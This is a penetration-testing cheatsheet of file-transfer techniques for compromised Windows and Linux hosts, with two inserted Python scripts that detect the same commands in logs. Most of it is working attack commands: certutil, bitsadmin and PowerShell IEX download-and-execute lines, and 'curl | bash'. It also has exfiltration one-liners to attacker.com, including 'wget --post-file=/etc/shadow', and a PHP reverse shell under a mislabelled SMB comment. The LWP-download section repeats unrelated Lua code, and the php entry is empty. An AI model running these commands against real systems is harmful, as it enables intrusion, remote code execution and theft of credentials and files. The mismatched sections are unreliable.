
File Transfer

What is this?

This is my cheatsheet for transferring files to and from target machines, which are Windows or Linux hosts. It is divided into two sections:

  • Windows
  • Linux

In each section I have listed the main techniques that will allow you to easily transfer files. The last part of each section above is named Others; it shows some more tricks that might be useful on a very hardened system. I haven’t had to use any of those yet on all the machines that I have solved; however, if the need arises, it’s something you could try.

Windows

Bitsadmin

bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file

Certutil

certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file

debug.exe

The debug.exe program acts as an assembler, disassembler, and hex dumping tool. We’re able to take binaries like netcat (nc.exe) and disassemble them into hex. A series of non-interactive echo commands will write out the binary file into its hex representation. We can then use debug.exe to assemble the hex file into the original binary file nc.exe on the compromised host. There is a 64k size limit for transferable files.

The nc.exe binary is close to our limit. We can use upx (an executable packer) to compress it further:

On Kali : upx -9 nc.exe

The file size is now more suitable for transfer and has been decreased in size by almost 50%. We can now convert the nc.exe file into a text file usable by debug.exe on our compromised Windows host. The tool we’ll be using is exe2bat.exe

Copy exe2bat to the current working directory :

cp /usr/share/windows-binaries/exe2bat.exe .

wine exe2bat.exe nc.exe nc.txt

This will produce a nc.txt file we can simply copy paste into the remote windows shell, and nc.exe will be automatically created on the compromised host.

OpenSSL

Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Serve the file on Kali : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file

Execute on Windows box to transfer file to C:\file : C:\path\to\openssl.exe s_client -quiet -connect AttackerIP:1234 > C:\file

PowerShell

Within PowerShell

  • Invoke-WebRequest -Uri "http://AttackerIP/file" -OutFile "C:\path\to\file"
  • (New-Object Net.WebClient).downloadFile('http://10.10.14.45/shell.bat', 'C:\Users\Public\Downloads\shell.bat')

Outside PowerShell

powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://AttackerIP/file')

Non-Interactive PowerShell script

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://AttackerIP/file" >>wget.ps1 
echo $file = "file" >>wget.ps1 
echo $webclient.DownloadFile($url,$file) >>wget.ps1 
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

IWR "http://yourip/shell.exe" -OutFile "shell.exe" : use this when transferring files over HTTP.

SMB

  • SMBserver.py

On Kali : python smbserver.py transfer_share /root/shells

On Target Windows :

// We can then check that our SMB share is up and running from our compromised Windows host

net view \\AttackerIP

// Windows commands like dir and copy can also be used

dir \\AttackerIP\transfer_share

copy \\AttackerIP\transfer_share\shell.exe

//Executing shell.exe on compromised Windows host via our SMB share ~ transfer_share

C:> \\AttackerIP\transfer_share\shell.exe

  • Impacket-SMBServer

On Kali : impacket-smbserver ShareName SharePath

On Windows (PowerShell) : New-PSDrive -Name ShareName -PSProvider "FileSystem" -Root "\\Kali-IP\ShareName"

If it has to be done natively, this can be used : net usershare add test /mount '' 'Everyone:F' guest_ok=y

Probably mount this on a docker container share.

TFTP

tftp -i AttackerIP get file

FTP

On Kali : apt-get install python-pyftpdlib && python -m pyftpdlib -p 21

With the server up and running, we can transfer files interactively or non-interactively:

  • Interactively :
//Interactive
C:> ftp AttackerIP
Connected to AttackerIP
User: anonymous 
Password: anonymous
...
ftp> binary 
ftp> get shell.exe
  • Non-Interactive :
//Non-Interactive
C:> echo open AttackerIP > c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo binary >> c:\ftp.txt
C:> echo get shell.exe >> c:\ftp.txt
C:> echo bye >> c:\ftp.txt
C:> ftp -s:C:\ftp.txt

Visual Basic Script (VBS)

  • Option 1 :
// Paste each line separately into Windows shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs 
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 
echo Err.Clear >> wget.vbs 
echo Set http = Nothing >> wget.vbs 
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 
echo http.Open "GET", strURL, False >> wget.vbs 
echo http.Send >> wget.vbs 
echo varByteArray = http.ResponseBody >> wget.vbs 
echo Set http = Nothing >> wget.vbs 
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 
echo strData = "" >> wget.vbs 
echo strBuffer = "" >> wget.vbs 
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 
echo Next >> wget.vbs 
echo ts.Close >> wget.vbs

cscript wget.vbs http://AttackerIP/file file

  • Option 2 :
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs

cscript transfer.vbs

Others

  • bitsadmin.exe

Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.

bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1

Privileges required : User

  • certutil.exe

Download and save 7zip to disk in the current folder.

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Privileges required : User

Download and save 7zip to disk in the current folder.

certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Privileges required : User

  • desktopimgdownldr.exe

Download : Downloads the file and sets it as the computer’s lockscreen.

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Usecase : Download arbitrary files from a web server

  • Esentutl.exe

Download : Copies the source EXE to the destination EXE file.

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

Usecase : Use to copy files from one UNC path to another

  • Expand.exe

Download : Copies source file to destination.

expand \\webdav\folder\file.bat c:\ADS\file.bat

Usecase : Use to copy the source file to the destination file

  • Extrac32.exe

Download : Copy the source file to the destination file and overwrite it.

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Usecase : Download file from UNC/WebDAV

  • Findstr.exe

Download : Searches for the string W3AllLov3DonaldTrump; since it does not exist (/V), file.exe is downloaded to the target file.

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

Usecase : Download/Copy file from WebDAV server

  • Ftp.exe

Download :

cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

Usecase : Spawn new process using ftp.exe. Ftp.exe downloads the binary.

  • GfxDownloadWrapper.exe

Download : GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by “Microsoft Windows Hardware”, “Compatibility Publisher”, “Microsoft Windows Third Party Component CA 2012”, “Microsoft Time-Stamp PCA 2010”, “Microsoft Time-Stamp Service”.

C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Usecase : Download file from internet

  • Hh.exe

Download : Open the target PowerShell script with HTML Help.

HH.exe http://some.url/script.ps1

Usecase : Download files from url

  • Ieexec.exe

Download : Downloads and executes bypass.exe from the remote server.

ieexec.exe http://x.x.x.x:8080/bypass.exe

Usecase : Download and run attacker code from remote location

  • Makecab.exe

Download : Downloads and compresses the target file and stores it in the target file.

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

Usecase : Download file and compress into a cab file

  • Replace.exe

Download : Download/Copy bar.exe to outdir.

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A

Usecase : Download file

  • Excel.exe

Download : Downloads payload from remote server.

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Usecase : It will download a remote payload and place it in the cache folder

  • Powerpnt.exe

Download : Downloads payload from remote server.

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

  • Squirrel.exe

Download : The above binary will go to url and look for RELEASES file and download the nuget package.

squirrel.exe --download [url to package]

Usecase : Download binary

  • Update.exe

Download : The above binary will go to url and look for RELEASES file and download the nuget package.

Update.exe --download [url to package]

Usecase : Download binary

  • Winword.exe

Download : Downloads payload from remote server.

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

  • Wsl.exe

Download : Downloads file from 192.168.1.10.

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Usecase : Download file
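Every entry in the Windows list above shows up in process-creation telemetry as a trusted binary plus one telltale argument (a URL, a UNC source, /dev/tcp). The following is an added example, not part of the original cheatsheet, that matches those pairs over constructed command lines; the rule names and the (host, CommandLine) event shape are assumptions.

```python
import re

# The remote half of a transfer one-liner: an HTTP(S) URL or a UNC source.
URL = r"https?://\S+"
UNC = r"\\\\[\w.-]+\\\S+"

# Hypothetical rule names. Each regex pairs a binary from the list above with
# the argument that makes it fetch remote content, so ordinary use is ignored.
RULES = {
    "bitsadmin_remote_job": rf"\bbitsadmin(\.exe)?\b.*/(transfer|addfile)\b.*{URL}",
    "certutil_url_fetch": rf"\bcertutil(\.exe)?\b.*[-/](urlcache|verifyctl)\b.*{URL}",
    "desktopimgdownldr_url": r"\bdesktopimgdownldr(\.exe)?\b.*/lockscreenurl:",
    "unc_source_copy": rf"\b(esentutl|expand|extrac32|findstr|makecab|replace)(\.exe)?\b.*{UNC}",
    "helper_opens_url": rf"\b(hh|ieexec|excel|winword|powerpnt|gfxdownloadwrapper)(\.exe)?\b.*{URL}",
    "squirrel_download": r"\b(squirrel|update)(\.exe)?\b.*--download\b",
    "wsl_dev_tcp": r"\bwsl(\.exe)?\b.*/dev/tcp/",
    "powershell_web_fetch": r"\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}


def classify(command_line):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]


def triage(events):
    """Keep only the events that hit at least one rule, with the rule names."""
    findings = []
    for host, command_line in events:
        hits = classify(command_line)
        if hits:
            findings.append({"host": host, "rules": hits, "command_line": command_line})
    return findings


# Constructed process-creation events (host, CommandLine), in the shape of
# Sysmon Event ID 1 or Security 4688 with command-line auditing enabled.
# Shell redirections (> file) are left out: they never reach the child's
# command line, so rules must not depend on them.
SAMPLE_EVENTS = [
    ("ws01", r"certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe"),
    ("ws01", r"certutil.exe -hashfile C:\Users\Public\7zip.exe SHA256"),      # benign
    ("ws02", r"findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe"),
    ("ws02", r'findstr /S /I "timeout" C:\logs\app.log'),                     # benign
    ("ws03", r"bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe"),
    ("ws03", r"bitsadmin /list /allusers"),                                   # benign
    ("ws04", r"powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://AttackerIP/file')"),
    ("ws05", r"wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'"),
    ("ws06", r'winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"'),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["host"], ",".join(finding["rules"]), "|", finding["command_line"])
```

A hit is a triage signal rather than a verdict: administrators also copy from UNC paths and fetch with PowerShell, so baseline by host and parent process before alerting.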


Linux

Bash

cat backup.7z > /dev/tcp/10.10.14.3/9001
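On Linux hosts the /dev/tcp transfers on this page are typically reviewed through auditd EXECVE records, where an argument containing a space is logged hex-encoded. The following is an added example, not from the original cheatsheet, that decodes such records and flags a few of the page's patterns; the records are constructed, audit_encode is a simplified stand-in for auditd's encoding, and the indicator names are hypothetical.

```python
import re

# aN="plain" or aN=HEX, as EXECVE arguments appear in an audit record.
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')


def audit_encode(arg):
    """Simplified stand-in for auditd's encoding (assumption): quote plain
    arguments, hex-encode any with whitespace, a quote or a control byte."""
    if re.search(r'[\s"\x00-\x1f\x7f]', arg):
        return arg.encode().hex().upper()
    return '"%s"' % arg


def make_record(serial, argv):
    """Build a constructed EXECVE record for the samples below."""
    args = " ".join("a%d=%s" % (i, audit_encode(a)) for i, a in enumerate(argv))
    return "type=EXECVE msg=audit(1700000000.000:%d): argc=%d %s" % (serial, len(argv), args)


def decode_execve(record):
    """Rebuild argv from an EXECVE record, undoing the hex encoding."""
    argv = {}
    for idx, quoted, hexed in ARG_RE.findall(record):
        if hexed:
            argv[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace")
        else:
            argv[int(idx)] = quoted
    return [argv[i] for i in sorted(argv)]


def flag(argv):
    """Return indicator names for one decoded argv."""
    prog = argv[0].rsplit("/", 1)[-1] if argv else ""
    hits = []
    if any("/dev/tcp/" in a for a in argv):
        hits.append("dev_tcp_in_args")
    if prog == "wget" and any(a.startswith("--post-file=") for a in argv):
        hits.append("wget_post_file")
    if prog == "curl" and any(a.startswith("@") for a in argv[1:]):
        hits.append("curl_body_from_file")
    return hits


def scan(records):
    """Decode every record and keep the ones with at least one indicator."""
    findings = []
    for record in records:
        argv = decode_execve(record)
        hits = flag(argv)
        if hits:
            findings.append((" ".join(argv), hits))
    return findings


# Constructed argv lists modelled on this page's Linux one-liners.
SAMPLE_ARGV = [
    # bash -c '...' : the single quotes keep $RHOST unexpanded in the record.
    ["bash", "-c", "cat < /dev/tcp/$RHOST/$RPORT > $LFILE"],
    # cat backup.7z > /dev/tcp/... : the shell performs the redirect, so the
    # only process executed is cat and the destination never reaches argv.
    ["cat", "backup.7z"],
    ["wget", "--post-file=/etc/shadow", "10.10.10.142"],
    ["curl", "-X", "POST", "-d", "@file_to_send", "http://attacker.com/"],
    ["curl", "-s", "https://example.org/health"],   # benign
]
SAMPLE_RECORDS = [make_record(100 + i, a) for i, a in enumerate(SAMPLE_ARGV)]

if __name__ == "__main__":
    for command, hits in scan(SAMPLE_RECORDS):
        print(",".join(hits), "|", command)
```

The second sample is the blind spot to remember: a redirect typed into an interactive shell leaves no trace in EXECVE arguments, so pair these rules with auditing of the connect syscall or with network telemetry.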

curl

curl http://AttackerIP/file --output /var/tmp/file

curl AttackerIP/linenum.sh | bash

# upload to SMB server 

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.48/1234 0>&1'");
phpinfo();
?>

fetch (FreeBSD)

fetch -o /var/tmp/file "http://AttackerIP/file"

netcat

nc -nlvp 1234 < file

cat file | nc AttackerIP 1234

Transferring files with progress in nc :

On Server Side : cat backup.iso | pv -b | nc -l 3333

On Client Side : nc 192.168.0.1 3333 | pv -b > backup.iso

Preferably run it on our side, because we will have the required dependency :

nc -lvp 1235 | pv -b > file

OpenSSL

Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Serve file (on Kali) : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file

Execute on Linux host to GET the file : openssl s_client -quiet -connect AttackerIP:1234 > file

Python

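#!/usr/bin/python
# Works on Python 2 and 3: use whichever urlopen is available.
try:
    from urllib.request import urlopen  # Python 3
except ImportError:
    from urllib2 import urlopen  # Python 2

u = urlopen('http://AttackerIP/file')
# Binary mode so the downloaded bytes are written unchanged.
with open('local_file', 'wb') as local_file:
    local_file.write(u.read())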

chmod +x download.py

python download.py

rsync

  • Download Folder : rsync -r rsync://user@ip/<remote_dir>/ .
  • Upload Folder : rsync -vvaP -6 <local dir> "rsync://user@ip/<remote dir>"

SCP

  • To download file from remote system (remote → local) : scp user@remote_host:remote_file local_file
  • To upload file to remote server (local → remote) : scp local_file user@remote_host:remote_file

socat

socat TCP4-LISTEN:8000,fork file:<file to transfer> // server

socat TCP4:<ip>:8000 file:<file to get>,create // client

wget

wget http://AttackerIP/file -O /var/tmp/file

sudo wget --post-file=/etc/shadow 10.10.10.142

Others

  • bash

1.1

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

1.2

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
  • cpan
cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
  • Curl

File upload : It can exfiltrate files on the network. Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is; instruct the service to not URL-decode the body. Omit the @ to send hard-coded data.

URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$LFILE $URL

File download : It can download remote files.

Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE
  • Easy Install

File upload : It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    export URL=http://attacker.com/
    export LFILE=file_to_send
    TF=$(mktemp -d)
    echo 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
    easy_install $TF
    
  • Serve files in the local folder running an HTTP server.

    export LPORT=8888
    TF=$(mktemp -d)
    echo 'import sys; from os import environ as e
    if sys.version_info.major == 3: import http.server as s, socketserver as ss
    else: import SimpleHTTPServer as s, SocketServer as ss
    ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
    easy_install $TF
    

File download : It can download remote files. Fetch a remote file via HTTP GET request. The file path must be absolute.

```
export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(whereis python)', '$(whereis python)', '-c', \"\"\"import sys;
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
easy_install $TF
```
  • Finger

File Upload : It can exfiltrate files on the network.

Send a binary file to a TCP port. Run sudo nc -l -p 79 | base64 -d > "file_to_save" on the attacker box to collect the file. The file length is limited by the maximum size of arguments.

RHOST=attacker.com
LFILE=file_to_send
finger "$(base64 $LFILE)@$RHOST"

File download : It can download remote files. Fetch remote binary file from a remote TCP port. Run base64 "file_to_send" | sudo nc -l -p 79 on the attacker box to send the file.

RHOST=attacker.com
LFILE=file_to_save
finger x@$RHOST | base64 -d > "$LFILE"
  • ftp

File Upload. It can exfiltrate files on the network. Send local file to a FTP server.

RHOST=attacker.com
ftp $RHOST
put file_to_send

File download : It can download remote files. Fetch a remote file from a FTP server.

RHOST=attacker.com
ftp $RHOST
get file_to_get
  • GDB

File upload

It can exfiltrate files on the network.

  • This requires that GDB is compiled with Python support. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    export URL=http://attacker.com/
    export LFILE=file_to_send
    gdb -nx -ex 'python import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' -ex quit
    
  • This requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.

    export LPORT=8888
    gdb -nx -ex 'python import sys; from os import environ as e
    if sys.version_info.major == 3: import http.server as s, socketserver as ss
    else: import SimpleHTTPServer as s, SocketServer as ss
    ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
    

File Download

It can download remote files. This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.

    export URL=http://attacker.com/file_to_get
    export LFILE=file_to_save
    gdb -nx -ex 'python import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r
    else: import urllib as r
    r.urlretrieve(e["URL"], e["LFILE"])' -ex quit
  • GIMP

File upload : It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    export URL=http://attacker.com/
    export LFILE=file_to_send
    gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
    

Serve files in the local folder running an HTTP server.

```
export LPORT=8888
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
```

File download : It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'
  • IRB

File upload : It can exfiltrate files on the network. Serve files in the local folder running an HTTP server on port 8888.

irb
require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;

File download : It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
irb
require 'open-uri'; download = URI.open(ENV['URL']); IO.copy_stream(download, ENV['LFILE'])
  • JJS

File download : It can download remote files. Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
echo "var URL = Java.type('java.net.URL');
var ws = new URL('$URL');
var Channels = Java.type('java.nio.channels.Channels');
var rbc = Channels.newChannel(ws.openStream());
var FileOutputStream = Java.type('java.io.FileOutputStream');
var fos = new FileOutputStream('$LFILE');
fos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);
fos.close();
rbc.close();" | jjs
  • jrunscript

File download : It can download remote files. Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
jrunscript -e "cp('$URL','$LFILE')"
  • ksh

File upload : It can exfiltrate files on the network.

  • Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
    export RHOST=attacker.com
    export RPORT=12345
    export LFILE=file_to_send
    ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
    
  • Send local file using a TCP connection. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file.
    export RHOST=attacker.com
    export RPORT=12345
    export LFILE=file_to_send
    ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
    

File download : It can download remote files. Fetch a remote file via HTTP GET request.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

Fetch remote file using a TCP connection. Run nc -l -p 12345 < "file_to_send" on the attacker box to send the file.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
  • LUA

File upload : It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires lua-socket installed.

```
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
lua -e '
local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
```

File download : It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file. This requires lua-socket installed.

```
export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
```
  • LWP-download

File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires lua-socket installed.

  export RHOST=attacker.com
  export RPORT=12345
  export LFILE=file_to_send
  lua -e '
  local f=io.open(os.getenv("LFILE"), "rb")
  local d=f:read("*a")
  io.close(f);
  local s=require("socket");
  local t=assert(s.tcp());
  t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
  t:send(d);
  t:close();'

File download : It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file. This requires lua-socket installed.

export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
  • nc

File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"

File download. It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file.

    LPORT=12345
    LFILE=file_to_save
    nc -l -p $LPORT > "$LFILE"
  • nmap

File upload : It can exfiltrate files on the network.

  • Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork` on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP port like 80 or 8080.

```
    RHOST=attacker.com
    RPORT=8080
    LFILE=file_to_send
    nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE
```
  • Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file.
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
TF=$(mktemp)
echo 'local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();' > $TF
nmap --script=$TF

File download : It can download remote files.

  • Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., php -S 0.0.0.0:8080. Note that multiple connections are made to the server and the result is placed in $TF/IP/PORT/PATH. Also, it is important that the port is a commonly used HTTP port like 80 or 8080.
RHOST=attacker.com
RPORT=8080
TF=$(mktemp -d)
LFILE=file_to_save
nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE
  • Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file.
export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);' > $TF
nmap --script=$TF
  • openssl

File upload : It can exfiltrate files on the network. To collect the file run the following on the attacker box:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save

Send a local file via TCP. Transmission will be encrypted.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"

File download : It can download remote files. To send the file run the following on the attacker box:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send

Fetch a file from a TCP port, transmission will be encrypted.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"
  • php

File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.

LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT

File download. It can download remote files. Fetch a remote file via HTTP GET request.

